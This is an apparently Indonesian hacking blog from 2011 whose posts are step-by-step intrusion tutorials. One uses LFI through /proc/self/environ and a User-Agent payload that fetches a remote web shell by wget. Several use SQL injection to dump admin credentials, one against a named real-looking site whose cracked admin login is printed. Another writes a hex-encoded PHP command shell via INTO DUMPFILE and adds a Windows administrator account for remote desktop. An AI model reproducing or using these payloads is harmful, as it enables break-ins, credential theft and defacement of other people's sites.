http://aux.iconpedia.net/uploads/10875870971013046993.pnghttp://aux.iconpedia.net/uploads/1540998406962263282.png !

Featured Post 1 Title

Replace these every slide sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.Download more free blogger templates from www.premiumbloggertemplates.com.

Read More

Featured Post 2 Title

Replace these every slide sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.Download more free blogger templates from www.premiumbloggertemplates.com.

Read More

Featured Post 3 Title

Replace these every slide sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.Download more free blogger templates from www.premiumbloggertemplates.com.

Read More

Featured Post 4 Title

Replace these every slide sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.Download more free blogger templates from www.premiumbloggertemplates.com.

Read More

Featured Post 5 Title

Replace these every slide sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.Download more free blogger templates from www.premiumbloggertemplates.com.

Read More

Featured Post 7 Title

Replace these every slide sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.Download more free blogger templates from www.premiumbloggertemplates.com.

Read More

Featured Post 6 Title

Replace these every slide sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.Download more free blogger templates from www.premiumbloggertemplates.com.

Read More

Join The Community

Search

Juli 31, 2011

Tanam Shell via LFI dengan Metode Proc/Self/Environ atau hack dengan metode shell

Dalam tutorial hacking kali ini saya akan coba mengimplementasikan bagaimana membuat shell pada target server lewat LFI dengan metode proc/self/environ, hal ini telah dibahas  sebelumnya di website milw0rm pada paper ke 361.
Ok kita langsung saja…

1. Hal yang pertama dilakukan seperti teknik-teknik lainnya adalah kita terlebih dahulu coba temukan website yang vulnerable terhadap serangan LFI.
contoh :
 http://site.com/info.php?file=news.php
2. coba kita ganti “news.php” dengan “../../../”.
contoh :  
http://site.com/info.php?file=../../../
lalu kita mendapat error, seperti berikut…
Warning: include(../../../) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99
ok sepertinya, kita mendapat kesempatan untuk memanfaatkan include ke file lain.

selanjutanya kita coba temukan /etc/passwd.
contoh :  
http://site.com/info.php?file=etc/passwd
Tetapi kita masih mendapat error seperti berikut :
Warning: include(/etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99
bagaimana jika kita naikan directorynya ?
mari kita coba…
contoh : 
http://site.com/info.php?file=../../../../../../../../../etc/passwd
Ahoi, kita berhasil mendapatkan file /etc/passwd yang terlihat seperti berikut :
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
hplip:x:103:7:HPLIP system user,,,:/var/run/hplip:/bin/false
avahi-autoipd:x:104:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
gdm:x:105:111:Gnome Display Manager:/var/lib/gdm:/bin/false
saned:x:106:113::/home/saned:/bin/false
pulse:x:107:114:PulseAudio daemon,,,:/var/run/pulse:/bin/false
messagebus:x:108:117::/var/run/dbus:/bin/false
polkituser:x:109:118:PolicyKit,,,:/var/run/PolicyKit:/bin/false
avahi:x:110:119:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
haldaemon:x:111:120:Hardware abstraction layer,,,:/var/run/hald:/bin/false
gunslinger:x:1000:1000:gunslinger_,,,:/home/gunslinger:/bin/bash
snmp:x:112:65534::/var/lib/snmp:/bin/false
guest:x:113:124:Guest,,,:/tmp/guest-home.rRZGXM:/bin/bash
sshd:x:114:65534::/var/run/sshd:/usr/sbin/nologin

 3. mari kita check apakah /proc/self/environ bisa kita akses ? 
    sekarang, ganti “/etc/passwd” dengan “/proc/self/environ”
contoh: http://site.com/info.php?file=../../../../../../../../../proc/self/environ
 Jika anda mendapatkan yang seperti ini :
DOCUMENT_ROOT=/home/gunslinger/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html,
application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif,
image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=3g4t67261b341231b94r1844ac2ad7ac
HTTP_HOST=www.site.com HTTP_REFERER=http://www.site.com/index.php?view=../../../../../../etc/passwd
HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15
PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665
REQUEST_METHOD= GET REQUEST_URI = /index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/gunslinger/public_html/index.php SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=gunslinger@site.com SERVER_NAME=www.site.com
SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k
PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at www.site.com Port 80
Ternyata proc/self/environ dapat kita akses !
jika anda mendapatkan halaman yang kosong (blank) /proc/self/environ tidak dapat di akses atau mungkin juga beroperating system *BSD

4. Sekarang mari kita injeksi dengann malicious kode dengan meracuni http-headernya . bagaimana kita bisa menginjeksinya? kita bisa menggunakan tamper data pada firefox addon.
dapat anda download disini : 
https://addons.mozilla.org/en-US/firefox/addon/966
buka tamper data di firefox lalu masukan url /proc/self/environ yang tadi 
“http://site.com/info.php?file=../../../../../../../../../proc/self/environ”
lalu pada user-agent isikan dengan kode berikut :
 <?system(‘wget http://r57.gen.tr/c100.txt -O shell.php’);?>
atau
<?exec(‘wget http://r57.gen.tr/c100.txt -O shell.php’);?>
lalu submit.

5. jika kita berhasil menginjeksi malicious kode berikut, maka shell akan ada di tempat seperti ini.
http://www.site.com/shell.php
happy hacking !

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-Patch-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(Continue)..

(Continue)..

Juli 30, 2011

SQL Injection Tutorial Part 1 By Binus

11 April 2011
Penulis:   · Kategori Artikel: Hacking



SqLi Tutorial – Sql Injection Tutorial – Sql Injection Artikel – SQL Injection Article
Sqli (alias Sql Injection atau Structured Query Language Injeksi) adalah langkah pertama dalam entri untuk memanfaatkan atau hacking website. Hal ini mudah dilakukan dan merupakan titik dari awal yang bagus. Sayangnya tutorial yang sedikit rumit sehingga itulah sebabnya ane menulis ini. Sqli pada dasarnya hanyalah suntikan pertanyaan ke dalam database atau menggunakan query untuk mendapatkan bypass otorisasi sebagai sebuah admin.
Untuk Mencari Inject
Mencari SQLI sangat mudah,semua yang perlu ente2 lakukan adalah Googling . Hal pertama yang perlu ente2 lakukan adalah menemukan beberapa dorks
Code:

inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:read.php?id=
"id=" &amp; intext:"Warning: mysql_fetch_assoc()
"id=" &amp; intext:"Warning: mysql_fetch_array()
"id=" &amp; intext:"Warning: mysql_num_rows()
Lebih lengkap, silakan dicari di Google Dorknya :)

PART 1

Pilih salah satu dorks dan menambahkan inurl: sebelum
(Jika mereka belum memiliki itu) dan kemudian salin dan sisipkan
ke google. Pilih salah satu situs dari google dan chek 1-1.
Sebagai contoh url dari halaman ente berada mungkin terlihat seperti ini
Code:

http://www.example.com/index.php?id=3

untuk memeriksa adanya Bug MySQL tinggal tambahin “‘” di akhir URL
contoh
Code:

http://www.example.com/index.php?id=3'

tekan enter sampai ente2 mendapatkan ERROR
Mendapatkan Jumlah Kolom
Setelah ente menemukan situs yg udah di siapin ,langkah pertama yang perlu ente2 ambil adalah
untuk menemukan jumlah kolom. Cara termudah untuk melakukannya adalah
menggunakan pernyataan “order by”. Yang harus ente lakukan adalah meletakkan ORDER BY (angka) -
pada akhir url ente. Jadi seharusnya terlihat seperti ini.
Code:

http://www.example.com/index.php?id=3 ORDER BY (number)--

setelahnya ane ubah jadi bahasa inggris dah..
capek translatenya
wkwkwkwkwkwkwkwkwkw :P
Yuk kita lanjutkan ke order by 8– kamu akan mendapatkan sebuah error. Ini membuktikan bahwa table database hanya memiliki 7 kolom, ini dibuktikan bahwa ketika anda melakukan order by lebih dari 7, akan selalu error. Jika kamu memiliki memory yang kurang baik, silakan buka notepad & catat kolom-kolom yang anda temukan.
Menemukan kolom yang dapat di akses
Setelah kita mengetahui kolom yang ada di table database, sekarang kita akan mencari informasi & data apa yang bisa diambil dari sana.
Kita melakukan hal tersebut dengan menggunakan fungsi “UNION” “SELECT” dan NOMOR KOLOM. Kita selipkan seluruhnya dalam URL, seperti contoh berikut:
Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7--

Jangan lupa untuk menyisipkan tanda “-” sebelum code dimulai, jadi sebagai contoh di atas kita selipka tanda “-” didepan angka “3“, nah setelah semua dilakukan, maka akan muncul table yang memiliki isi didalamnya. Catatlah nomor kolom table yang memiliki informasi di dalam database tersebut. Klo lupa, simpan dulu di notepad.
Finding MySQL Database Version
Sebelum kita melanjutkan hal ini, maka yang perlu kita ketahui adalah versi dari database.
URL nya adalah sebagai berikut:
Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7--

Kita ganti angka “1” dengan  “@@version” untuk mengetahui informasi versi database, berikut contohnya:
Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+@@version,2,3,4,5,6,7--

Tekan enter, maka anda akan menemukan informasi database yang digunakan.
Hal ini biasanya bekerja pada versi database 5.* keatas.
Finding Database Names
Selanjutkan kita akan inject website untuk menemukan database names. Kita lakukan hal ini dengan mengganti “@@version
dengan “group_concat(schema_name)” dan juga ditambahkan “+ from+information_schema.schemata–” sesudah nomor kolom terakhir di table database.
Seperti ini contoh URLnya:
Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+group_concat(schema_name),2,3,4,5,6,7+ from+information_schema.schemata--

Hal tersebut akan menunjukkan daftar nama database. Sekarang untuk menemukan database mana yang saat ini dipakai adalah dengan mengganti “group_concat(schema_name)” dengan concat(database()) dan hapus “+ from+information_schema.schemata
Jadi URL nya akan menjadi seperti ini:
Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+concat(database()),2,3,4,5,6,7--

Selamat, anda telah mendapatkan informasi database yang saat ini digunakan.
Menemukan Nama Table
Untuk mengetahui nama table yang digunakan dalam database, anda harus mengganti “concat(database())” dengan group_concat(table_name) dan tambahkan “from information_schema.tables where table_schema=database()” diantara nomor awal dan “–” hapus juga tanda “+” dari “union select“.
Urlnya akan tampak seperti berikut:
Code:

http://www.example.com/index.php?id=-3  union select group_concat(table_name),2,3,4,5,6,7 from information_schema.tables where table_schema=database()--

Nah, hal tersebut akan menampilkan nama table yang digunakan di database.
Menemukan Nama Kolom
Lakukan dengan hanya merubah “table_name” ke “column_name” dan “information_schema.tables” ke “information_schema.columns”.
Url akan tampak seperti ini:
Code:

http://www.example.com/index.php?id=-3  union select group_concat(column_name),2,3,4,5,6,7 from information_schema.columns where table_schema=database()--

Hal tersebut akan memunculkan nama table.
Misalkan nama colom seperti berikut:
admin_username
admin_password
Mengambil Informasi Database
Sekarang kita sudah mengetahui “database name, table names, dan colomn names”, kita bisa menyatukannya bersama-sama dan mengeluarkan informasi yang ada di sana, kita lakukan dengan contoh berikut:

contoh kata yang keluar adalah id,username,password

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws
(0x3a,id,username,password),6,7,8+from+admin--

Nah, nanti akan ada beberapa password yang sudah di encrypt. jadi butuh decrtypt dulu ini membuka encrypt password nya

Decrypt password Disini : http://www.hashchecker.de/
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  Binggo kita dapat password...


 PART II
Mari kita coba praktekkan cara diatas!
Sebagai contoh kita mendapatkan target sebagai berikut:
Code:
http://www.cocobod.gh/news_details.php?id=30
Sekarang kita akan melakukan pengecekan apakah website tersebut memiliki vulnerability dengan menambahkan tanda di akhir URL, contohnya sebagai berikut:
Code:
http://www.cocobod.gh/news_details.php?id=30'
Jika kita menemukan error, maka terdapat vulnerability di website tersebut, sebagai contoh:

Setelah kita mengetahui ada vulnerability, maka langkah selanjutkan adalah kita harus mengetahui berapa jumlah kolom yang ada di table tersebut.
Kita akan mengetahuinya sampai ada informasi “Unknown Column“.
Lakukan pengecekan dengan menggunakan perintah “order by“.
Kita akan mencoba dari 1……..tak hingga, jadi bisa saja 1,2,3,4,5,6,7,dst.
Kebetulah dalam target ini hanya terdapat 7 kolom dalam table yang ada di database,
Contohnya:

Langkah pengetesannya adalah
Code:
http://www.cocobod.gh/news_details.php?id=30 order by 1-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 2-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 3-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 4-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 5-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 6-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 7-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 8-- >> Unknown column
http://www.cocobod.gh/news_details.php?id=30 order by 8– *>> Unknown column
Hal tersebut membuktikan bahwa tidak ada kolom ke 8 dalam table tersebut, jadi cuman ada 7 kolom.
Langkah selanjutnya adalah, mencari kolom yang dapat di akses!
Kita sudah mengetahui, jumlah kolom adalah 7, kita gunakan perintah “UNION SELECT number,of,columns–” untuk mengatahui kolom mana yang dapat di akses:
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,6,7--
Anda akan menemukan seperti gambar berikut:
Binus Hacker Tutorial
Muncul 6, 2, 3 kan? Kolom dalam tersebutlah yang bisa anda akses dan anda ambil informasinya.
Langkah selanjutnya, mencari informasi versi database
SQL Injection bekerja baik pada versi 5.* ke atas, untuk mendapatkan informasi database version, kita masukkan saja “@@version”, pada kolom dimana saja yang bisa dipakai.
Misalkan kolom “6″ kita ganti dengan “@@version”
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,@@version,7--
Binus Hacker Tutorial
Akan muncul versi database 5.1.39, ini berarti database bisa di inject :)
Mengetahui Database Name
Langsung ajah kita replace kolom yang tadi digunakan “6,2,3″ dibagian mana saja, kita gunakan kolom “6″, kita ganti dengan code berikut “group_concat(schema_name)” , dan jangan lupa tambahkan “from information_schema.schemata–” sesudah kolom terakhir.
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(schema_name),7 from information_schema.schemata--
Binus Hacker Tutorial
Mengatahui Database Yang Dipakai
Langsung ajah ganti “group_concat(schema_name)” dengan “concat(database())” seperti contoh berikut:
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,concat(database()),7 from information_schema.schemata--
Binus Hacker Tutorial
Selamat, anda telah mengetahui database yang dipakai saat ini adalah “cocobod_gh“.
Mengetahui Nama Tabel
Langsung aja ganti “group_concat(table_name)” dan tambahkan “from information_schema.tables where table_schema=database()–” setelah kolom terakhir.
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(table_name),7 from information_schema.tables where table_schema=database()--
Binus Hacker Tutorial
Mengatahui Nama Kolom
Untuk mengetahui nama kolom, kita gunakan query berikut:
group_concat(column_name)
from information_schema.columns where table_schema=database()–
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(column_name),7 from information_schema.columns where table_schema=database()--
Binus Hacker Tutorial
Mengambil Informasi Yang Ada Di Dalam Kolom
Ini adalah step akhir, dimana anda akan mendapatkan informasi mengenai isi dari kolom yang berada dalam table di database.
Eksekusi perintah berikut:
Code:
http://www.site.com/news_details.php?id=30 union select 1,2,3,4,5,group_concat(columusername,0x3a,columnpassword),7 from currentdb.tableused--
Exploit akan menjadi seperti berikut :
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(username,0x3a,password),7 from cocobod_gh.coc_admin--
Binus Hacker Tutorial
Dari informasi di atas kita mendapatkan data: “comaster:2c39e3769d300f7e23f8a9e1e21773e7 ,
Silakan check ke MD5 decrypter untuk mendecrypt password -> http://www.md5decrypter.co.uk/ paste MD5 password yang tadi yaitu: “2c39e3769d300f7e23f8a9e1e21773e7“, anda akan medapatkan result seperti dibawah:
Binus Hacker Tutorial
comaster:2c39e3769d300f7e23f8a9e1e21773e7
comaster:cocoadmin4682
username : comaster
password : cocoadmin4682

Selamat, anda sudah bisa login ke page dengan user & password di atas :)
Credit: Easy|Hack & Revision By BinusHacker Team
(Continue)..

(Continue)..

Juli 29, 2011

Belajar SQL Injection 2

Untuk mengecek apakah suatu site memiliki bug kita dapat menggunakan cara-cara berikut :

a. Letakkan karakter Single Quote pada akhri url address bar.
ex :
http://www.target.com/index.php?pageID=1' <== karakter diletakkan di belakang url address bar.

b. Gunakan Operator Logika.
Anda bisa gunakan operator and,or,dll.
Ex 1 :
and 1=1
ex :
http://www.target.com/index.php?pageID=1 and 1=1 <== Return True, artinya jika kita meletakkan operator logika tersebut maka tidak terjadi error alias page berjalan dengan normal.

Ex 2 :
and 1=2
ex :
http://www.target.com/index.php?pageID=1 and 1=2 <== Return False, artinya jika kita meletakkan operator logika tersebut maka terjadi error alias page tidak berjalan dengan normal.

Note : Untuk menggunakan operator logika tergantung dengan kebutuhan yang diperlukan. Selain itu kekreatifitasan kita dituntut disini. Kenapa? karena kadang ketika kita meletakkan operator logika, situs tidak memberi respon apa-apa. Untuk itu, kekreatifitasan anda di perlukan disini. Bagaimana anda membangkitkan error. Hehehehehehe Smile


2. Cek Kolom.
Setelah kita mengetahui bahwa suatu site memiliki bug sql injection, maka tahap selanjutnya adalah mengecek kolom yang ada. Untuk mengecek kolom, kita dapat gunakan statement "ORDER By x", dimana x adalah nilai increment dari integer 1,2,...dst. Increment maksudnya adalah lakukan penambahan nilai x sampai ditemukan pesan error seperti "... Unknown Colomn 'x' ...".
ex :

 http://www.target.com/index.php?pageID=1+order+by+1/* <== Return True.


 http://www.target.com/index.php?pageID=1+order+by+2/* <== Return True.


 http://www.target.com/index.php?pageID=1+order+by+3/* <== Return True.


- http://www.target.com/index.php?pageID=1+order+by+4/* <== Return False.

Note : Kita asumsikan bahwa ketika kita memasukkan nilai 4, maka muncul pesan error "Unknown Colomn '4'", maka kita dapat menarik suatu kesimpulan bahwa kolom yang ada hanya 1,2, dan 3.


3. Cek Hole Pada Kolom.
Untuk mengecek di kolom berapa terdapat hole atau kolom yang bermasalah kita bisa gunakan stament "UNION ALL SELECT " atau "UNION SELECT " ,dll.

Note : Ingat!!!jangan lupa menggunakan karakter "-", seperti dibawah ini :

ex :

http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,2,3/*

Note : Kita asumsikan kolom yang bermasalah terdapat pada angka '2'. Bagaimana cara kita mengetahuinya ? kita bisa lihat pada page, karena kolom yang bermasalah tersebut nantinya akan ditampilkan pada page. Lagi-lagi kejelian mata dan kekreatifitasan kita di butuhkan disini!!!

4. Cek Versi MYSQL.
Mengapa perlu mengecek versi dari MySQL? karena teknik sql injection untuk v 4.xx atau < v 5.xx tidak sama. Pada paper ini saya menggunakan v 5.xx.

Untuk mengecek versi mysql kita bisa gunakan statement "@@version,version(),dll" tergantung kebutuhan system.

Note : Jika page tidak meload versi mysql? Gunakan kreatifitas anda. Lakukan manipulasi-manipulasi pada url address, seperti :
convert(@@version using latin1), unhex(hex(@@version)) , dll.
ex : 

http://www.target.com/index.php?pageID=-1+ UNION+ALL+SELECT+1,@@version,3/*
ex :
http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,
convert(@@version+using+latin1),3/*
ex : 
http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,
unhex(hex(@@version)),3/*

Note : Kita Asumsikan versi dari mysql adalah 5.x.x
5. Cek Tabel dan Kolom.
a. Cek Tabel.
Untuk mengecek tabel gunakan statement berikut :

" information_schema.tables + table_name "

ex : 

http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,
table_name,3+from+information_schema.tables/*

Note :
- Jika page tidak meload informasi tabel, gunakan convert() atau unhex(hex()) atau lainnya.

- Gunakan statement Limit untuk mengekstrak tabel yang ada.
ex : 

http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,
table_name,3+from+information_schema.tables+limit+1,1/* <=== Lakukan increment pada angka 1,1 sampai kita temukan informasi tabel yang berguna, seperti user,username,admin,administrator,dll

b. Cek Kolom
Cara pengecekan kolom hampir sama dengan pengecekan tabel, hanya saja pada pengecekan kolom kita gunakan statement berikut :

" information_schema.columns ... column_name ... "
ex :
http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,
column_name,3+from+information_schema.columns/*

Note : Gunakan Statment Limit untuk mengekstrak kolom-kolom yang ada.

Tips : Untuk mengekstrak kolom pada tabel tertentu kita bisa gunakan statement berikut :
ex:

http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,
column_name,3+from+information_schema.columns+where+table_name='user'/* <=== kita asumsikan kita telah mengetahui bahwa terdapat tabel user.

Note : Seperti biasa untuk mengekstrak kolom-kolom tersebut kita gunakan statement LIMIT.

6. Get Value of Colomn.
Setelah kita ketahui nama-nama kolom yang ada pada table, maka langkah selanjutnya adalah mengekstrak nilai-nilai tersebut. Untuk mengekstrak nilai tersebut kita bisa melakukannya secara satu persatu dan atau secara keseluruhan atau bersamaan.
 
Note : Asumsikan bahwa kita mengetahui bahwa table user memiliki kolom

'username' dan 'password'.

a. Secara satu per satu.
ex : 

http://www.target.com/index.php?pageID=-1+UNION+ALL+ 
SELECT+1,username,3+from+user/*
ex : 
http://www.target.com/index.php?pageID=-1+UNION+ALL+
SELECT+1,password,3+from+user/*

b. Secara keseluruhan atau bersamaan.
Gunakan statement concat() atau concat_ws()

 ex : 
http://www.target.com/index.php?pageID=-1+UNION+ALL+
SELECT+1,concat(username,0x3a,password),3+from+user/* <=== 0x3a adalah hexa dari karakter ' : '

Sumber

                                              "بسم الله الرحمن الرحيم"
(Continue)..

(Continue)..

Juli 28, 2011

Cara hack vBulletin nulled - Video

Ini adalah video saya dibuat untuk Anda. Ini menjelaskan cara untuk mengekspor database dari sebuah forum vBulletin nulled. Ini benar-benar mudah;)

This Vidio:

(Continue)..

(Continue)..

Video Tutorial: Cara ke root server berbasis linux.

Namun tutorial lain saya buat, ini akan menjelaskan kepada Anda bagaimana untuk mendapatkan root pada sebuah server berbasis linux. Ada beberapa hal yang diperlukan untuk ini meskipun:

- Shell Sebuah upload ke website
- Membuka port [1337]
- Kesabaran

Rooting adalah ketika Anda mendapatkan akses root pada server berbasis linux. Ini manfaat Anda dengan banyak hal, seperti memiliki kontrol atas semua situs pada server. Terlalu buruk sekalipun, banyak yang ditambal kernel dan baru.

Video:
(Continue)..

(Continue)..

SQL Injection Tutorial dan Shell Upload

Ini adalah video tutorial yang menjelaskan bagaimana Anda dapat melakukan MySQLi dasar tentang website, mendapatkan data login dan meng-upload administrator shell melalui admin cp. Berikut explaination kecil apa SQL Injection tidak. SQL Injection parodi query dikirim ke database.

Tutorial Video sini:


(Continue)..

(Continue)..

Juli 27, 2011

SQL RemoteDesktop

__     ___
  ____   _____   ____   _________      ___________   |__| __| _/
 /  _ \ /     \_/ __ \ / ___\__  \    /  _ \_  __ \  |  |/ __ | 
(  <_> )  Y Y  \  ___// /_/  > __ \_ (  <_> )  | \/  |  / /_/ | 
 \____/|__|_|  /\___  >___  (____  / /\____/|__|    /\__\____ | 
             \/     \/_____/     \/  \/             \/       \/ 
    
    
OMEGA|ZINE RELEASE
       02

Author: cloud || cloud13@gmail.com
Online @ www.omega.or.id :: http://ezine.omega.or.id

== SQL RemoteDesktop  ==


kalau misalkan ada yang salah silahkan di perbaiki
maklum aq juga lagi dalam tahap pembelajaran

#1
untuk langkah pertama, cari web target yang vuln dengan sql injection, kalo masalah
pencarian dan dork saya serahkan pada kalian dan bisa bertanya pada paman Google,

#2
setelah mendapatkan web yang vuln dengan SQL Injection, lalu kita cari alamat IP dari 
web tersebut (memudahkan kita dalam meremote dekstop,sebab dalam meremote,kita akan 
dimintai alamat IPnya)

#3
nah udah dapetkan alamat IP web yang bersangkutan, setelah itu cari kolom yang
bermasalahnya(Metode SQL Injection), misalkan kita dapet kolom 1

code:
192.168.0.1/index.php?=-1+union+select+1--

kemudian cari versinya

code:
192.168.0.1/index.php?=-1+union+select+version()--

disini saya baru melakukan pada SQL yang versi 5.x

#4
ganti kolom yang bermasalah dengan : 192.168.0.1/index.php?=-1+union+select+load_file('c:/boot.ini')--

perintah load_file('c:/boot.ini') digunakan untuk memanggil informasi boot dalam komputer korban


#5
setelah itu kita convert 

code:
<? php system($_get['CMD']) ?>

kedalam bentuk Ascii, saya sudah tahu pasti pada maleskan convertnya, kalo gitu saya kasih aja hasilnya

code:
0x3c3f7068702073797374656d28245f6765745b5c27434d445c275d293b203f3e


#6
ok kalo gitu sekarang kita buat file cmd.php dengan syntak SQL

code:
192.168.0.1/index.php?=-1+union+select+0x3c3f7068702073797374656d28245f6765745b5c27434d445c275d293b203f3​e+into+dumpfile+'c:/xampp/htdocs/cmd.php'--

0x3c3f7068702073797374656d28245f6765745b5c27434d445c275d293b203f3e >> conversian dari <? php system($_get['CMD']) ?>

+into+dumpfile+ >> untuk membuat file kedalam server

c:/xampp/htdocs/cmd.php >> dari pesan error SQL(tanda '\' diubah menjadi '/'), kalo dapet yang pk appserv maka C:/AppServ/www/cmd.php


#7
ubh URL menjadi

code:
192.168.0.1/cmd.php?cmd=dir

maka akan terlihat atau keluar data-data yang ada pada drive c:/ komputer korban

#8
nih code yang w rada kurang ngerti, coz w gak ngerti dari mana asalnya, tapi w paham codenya buat apa

ketikan pada URL : 192.168.0.1/cmd.php?cmd=net user kiddies 12345 /add

net user kiddies 12345 /add >> perintah diatas adalah untuk membuat username dan password 
baru dalam system komputer

code:
192.168.0.1/cmd.php?cmd=net localgroup administrator kiddies /add

net localgroup administrator kiddies /add >> perintah ini untuk membuat username kita adalah 
administrator dalam system komputer

#9
ketikan pertintah pada run >> mstsc 


#10
komputer sudah ditangan anda, silahkan pergunakan dengan sebaik-baiknya dan bijak....


 REFERENSI a.k.a bacaan :
 -ebook in my laptop :)
(Continue)..

(Continue)..

Juli 26, 2011

Tutorial Deface Untuk Pemula



Sharing Lagi Nih... Tutorial Deface Suatu Web Dengan Munggunakan Sebaik Mungkin Suatu Vuln / Eror Di Suatu Web Site.

Langsung Aja ...

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --

information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

===========
[+]step Satu:=
===========

carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh: [site]/berita.php?id=100' atau
[site]/berita.php?id=-100

sehingga muncul pesan error seperti berikut ( Masih Banyak Lagi ) :

"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1"

==========
[+]step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

